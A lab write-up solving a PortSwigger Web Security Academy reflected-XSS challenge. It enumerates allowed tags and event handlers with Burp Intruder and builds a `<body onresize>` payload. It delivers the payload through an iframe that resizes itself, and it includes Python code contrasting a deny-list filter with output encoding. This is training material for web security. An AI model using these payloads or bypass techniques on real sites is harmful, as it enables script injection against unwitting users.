# 14) Reflected XSS into HTML context with most tags and attributes blocked

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FGaVpBGCpl5GvXf2V01iq%2Fimage.png?alt=media&#x26;token=19670840-3f6a-48df-9298-d9f1e85fcfde" alt=""><figcaption></figcaption></figure></div>

#### Locate possible injection points

As usual, the first step is to analyse the application. It has a search function, so let's search for a random string, then open the developer tools and find where the user input ends up in the HTML.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FVS1ifTYx5o5zHLmlGkTQ%2Fimage.png?alt=media&#x26;token=b938a7f6-0274-46fd-af54-a8763009bad8" alt=""><figcaption></figcaption></figure></div>

Now let's put an ordinary HTML tag in the search box.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fo7p1tdTRhZr4INKuwJSc%2Fimage.png?alt=media&#x26;token=7efac7a6-9b08-4c7c-9018-da2a59354c82" alt=""><figcaption></figcaption></figure></div>

When we click search we get `tag is not allowed`.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FENxOw3uREXNy7ES7LbJ4%2Fimage.png?alt=media&#x26;token=cee58365-6627-4d80-90a4-3efa8af6b01f" alt=""><figcaption></figcaption></figure></div>

So there is a blacklist mechanism that rejects tag names.

Send the search request from the proxy history to Burp Intruder:

* In Burp Intruder, in the Positions tab, replace the value of the search term with: `<>`
* Place the cursor between the angle brackets and click "Add §" twice, to create a payload position. The value of the search term should now look like: `<§§>`

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FkOEOZYmCilKEVMhOR2v2%2Fimage.png?alt=media&#x26;token=fcf79e8c-36a9-4ca3-b04d-f76aad27b432" alt=""><figcaption></figcaption></figure></div>

* Visit the [XSS cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) and click "Copy tags to clipboard".
* In Burp Intruder, in the Payloads tab, click "Paste" to paste the list of tags into the payloads list, then click "Start attack".

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F9ib8YOVbKpoIJbB3pKQS%2Fimage.png?alt=media&#x26;token=1fe057a1-7e06-4439-8c38-a80ef9c63552" alt=""><figcaption></figcaption></figure></div>

When the attack finishes, sort the results by the Status column: blocked tags return 400, and the few that return 200 are the ones the blacklist lets through.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FxHHOktgQkmWw3DczzkYj%2Fimage.png?alt=media&#x26;token=4cf18bc1-c47e-4337-8fb5-b9d94e79a6ac" alt=""><figcaption></figcaption></figure></div>

Now let's try to use the `body` tag (one of the tags that returned 200) to trigger an XSS.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FUB7ckf4HMalKWQ64USTd%2Fimage.png?alt=media&#x26;token=40fbd08e-d035-4562-a5cd-7f082b25a382" alt=""><figcaption></figcaption></figure></div>

The request is rejected again: the app also blacklists attribute names.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F9huILiX7QRu9hWKmG7GA%2Fimage.png?alt=media&#x26;token=7ced452d-4957-4ebf-8cf7-4c46cfbe4b1c" alt=""><figcaption></figcaption></figure></div>

Again, do the same thing to find the allowed attributes. This time the payload position has to sit inside the allowed tag, in the attribute name, so set the search term to `<body%20§§=1>` (the space is URL-encoded):

* Visit the [XSS cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) and click "Copy events to clipboard".
* In Burp Intruder, in the Payloads tab, click "Clear" to remove the previous payloads. Then click "Paste" to paste the list of event handler attributes into the payloads list. Click "Start attack".

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fxdv3WmAnRE8F03GtMAwA%2Fimage.png?alt=media&#x26;token=7fe98cd7-3c46-4b23-9697-a0e95e5c931c" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FiwgRy98zxhpgWyLIa71H%2Fimage.png?alt=media&#x26;token=9f87ecf2-34fe-4206-9bd5-0fe13dddbd22" alt=""><figcaption></figcaption></figure></div>

When the attack is finished, review the results and sort by status again. Almost all payloads caused an HTTP 400 response; the few that returned 200 are the event handlers the blacklist forgot.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FxiBTxC3otWS2ZCzhWjDt%2Fimage.png?alt=media&#x26;token=d42aaef9-1a44-4c52-af11-2d44eb2151ea" alt=""><figcaption></figcaption></figure></div>
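The two Intruder runs above are really one check: does a name-based deny list let anything through? The following is an added example (not the lab's code, whose server side is not public) that models the observed behaviour with constructed deny lists, replays the tag and event enumeration against it, and puts the hardened alternative beside it. The tag and event lists are small subsets of the cheat sheet, and the message strings match what the lab shows; everything else is an assumption.

```python
import html
import re

# Constructed model of the lab's server-side filter. The real code is not public;
# these deny lists are assumptions that reproduce the behaviour observed above:
# a blocked tag name gives "Tag is not allowed", a blocked attribute name gives
# "Attribute is not allowed", anything else is reflected unencoded into the <h1>.
BLOCKED_TAGS = {"script", "img", "svg", "iframe", "a", "object", "embed", "video",
                "audio", "input", "button", "form", "math", "style", "link", "details",
                "marquee", "select", "textarea", "meta", "base"}
BLOCKED_ATTRS = {"onload", "onerror", "onclick", "onmouseover", "onmouseenter", "onfocus",
                 "onblur", "ontoggle", "onbegin", "href", "src", "style", "autofocus"}

TAG_RE = re.compile(r"<\s*([A-Za-z][\w-]*)([^>]*)>")
ATTR_RE = re.compile(r"([A-Za-z][\w-]*)\s*=")


def deny_list_filter(term):
    """Vulnerable handler: returns (status, body). Rejects names on the deny
    lists and reflects everything else raw into an HTML text context."""
    for m in TAG_RE.finditer(term):
        tag, attrs = m.group(1).lower(), m.group(2)
        if tag in BLOCKED_TAGS:
            return 400, "Tag is not allowed"
        for a in ATTR_RE.finditer(attrs):
            if a.group(1).lower() in BLOCKED_ATTRS:
                return 400, "Attribute is not allowed"
    return 200, f"<h1>0 search results for '{term}'</h1>"


def encode_output(term):
    """Hardened handler: no deny list at all; the term is HTML-encoded for the
    context it lands in, so no tag or attribute can ever be created from it."""
    return 200, f"<h1>0 search results for '{html.escape(term, quote=True)}'</h1>"


def probe(handler, candidates, template):
    """Replay of the Intruder attack: one request per candidate wrapped in
    `template`, keeping the ones the handler lets through with status 200."""
    return [c for c in candidates if handler(template.format(c))[0] == 200]


# Constructed subsets of the cheat sheet's tag and event lists.
TAGS = ["script", "img", "svg", "iframe", "body", "custom", "details", "marquee"]
EVENTS = ["onload", "onerror", "onmouseover", "ontoggle", "onresize", "onfocus"]

if __name__ == "__main__":
    allowed_tags = probe(deny_list_filter, TAGS, "<{}>")             # ['body', 'custom']
    allowed_events = probe(deny_list_filter, EVENTS, "<body {}=1>")  # ['onresize']
    payload = f'<{allowed_tags[0]} {allowed_events[0]}="print()">'
    print("deny list :", deny_list_filter(payload))  # 200, payload reflected as live HTML
    print("encoded   :", encode_output(payload))     # 200, payload reflected as inert text
```

Against `encode_output` the same two `probe` calls return everything with 200, and that is the point: the status code no longer tells the attacker anything, because the reflected text cannot become markup whatever name it contains. A deny list only ever blocks the names its author remembered.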

Now, using the allowed tag and attributes, let's construct an XSS payload.

Searching the [portswigger xss cheat sheet list](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet), I found a payload using the `onresize` event handler, which is allowed:

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FbhHh08qRtjqwhAwCkjb1%2Fimage.png?alt=media&#x26;token=152d9f9f-8571-42dc-987b-9774847ac2ad" alt=""><figcaption></figcaption></figure></div>

```
xxxx"<body onresize="print()">
```

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FQ9WnRk9oBk9S6ULh8bdm%2Fimage.png?alt=media&#x26;token=e043381c-3ddb-4664-8470-b3c69c9d7c41" alt=""><figcaption></figcaption></figure></div>

If we resize the browser window, the print dialog is shown:

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FNesgP7WP1weQ1TWoPjEm%2Fimage.png?alt=media&#x26;token=2b865810-3a68-4793-896f-9859d8c6a338" alt=""><figcaption></figcaption></figure></div>

So the payload triggers successfully.

Now let's go to the exploit server and deliver this payload to the victim.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FrCwZtLe9MhcXerbHa4IN%2Fimage.png?alt=media&#x26;token=5895d12d-0d73-4885-bfa2-ee55238a1a5e" alt=""><figcaption></figcaption></figure></div>

We need to put our payload in an iframe and send it to the victim.

The `print()` call has to fire without any user interaction, so I need a way to force the `resize` event instead of relying on the victim to resize the window.

For this I use an iframe that loads the search URL and changes its own width once it has loaded, which fires a `resize` event inside the framed page:

```
<iframe src="https://0a5e00a603f682d58171d9c200cb004c.web-security-academy.net/?search=xxxx"<body onresize="print()">" onload=this.style.width='250px'></iframe>
```

The raw `"` in the search term would close the iframe's `src` attribute early, so I URL-encode the entire search term to make sure nothing goes amiss inside the iframe:

```
<iframe src="https://0a5e00a603f682d58171d9c200cb004c.web-security-academy.net/?search=%78%78%78%78%22%3c%62%6f%64%79%20%6f%6e%72%65%73%69%7a%65%3d%22%70%72%69%6e%74%28%29%22%3e" onload=this.style.width='250px'></iframe>
```
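As an added example (not from the original writeup), the delivery page above can be generated and checked rather than hand-encoded. It assumes the lab host from this writeup and encodes every byte of the search term in lowercase hex, which reproduces the encoded string above byte for byte; the assertion that no raw quote survives is the check that the `src` attribute will stay intact.

```python
from urllib.parse import unquote

# Lab host taken from this writeup; the exploit server URL is whatever the lab gives you.
LAB_ORIGIN = "https://0a5e00a603f682d58171d9c200cb004c.web-security-academy.net"
PAYLOAD = 'xxxx"<body onresize="print()">'


def percent_encode_all(s):
    """Percent-encode every byte of `s` in lowercase hex, reserved or not, exactly
    as the encoded search term above was produced. urllib.parse.quote() would leave
    the letters alone, which is also fine; what matters is that no raw '"', '<' or
    '>' survives into the iframe's src attribute."""
    return "".join("%%%02x" % b for b in s.encode("utf-8"))


def exploit_page(lab_origin, payload):
    """HTML to host on the exploit server. The framed search page reflects the
    payload; once it has loaded, the outer page shrinks the frame from its default
    300px width to 250px, which fires a resize event inside the frame and runs the
    onresize handler without the victim touching anything."""
    encoded = percent_encode_all(payload)
    return (f'<iframe src="{lab_origin}/?search={encoded}" '
            "onload=\"this.style.width='250px'\"></iframe>")


if __name__ == "__main__":
    print(exploit_page(LAB_ORIGIN, PAYLOAD))
```

The `onload` attribute is quoted here, unlike the hand-written version above; both parse the same way, since the only characters inside it are single quotes.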

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FeXnqaGACgBd0423JuZwV%2Fimage.png?alt=media&#x26;token=0cf6d755-a1ff-485c-ae25-a5c2a7963bd6" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FPBOxr5zV44Pmk51QzkmU%2Fimage.png?alt=media&#x26;token=47294cca-c123-4cb5-bf43-80b8fa33b34f" alt=""><figcaption></figcaption></figure></div>

Deliver it to the victim and the lab is solved.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FIFVVSZb2XlYnwbWnnEXM%2Fimage.png?alt=media&#x26;token=0b2b1cef-d437-45c2-b714-103e4ae65fce" alt=""><figcaption></figcaption></figure></div>
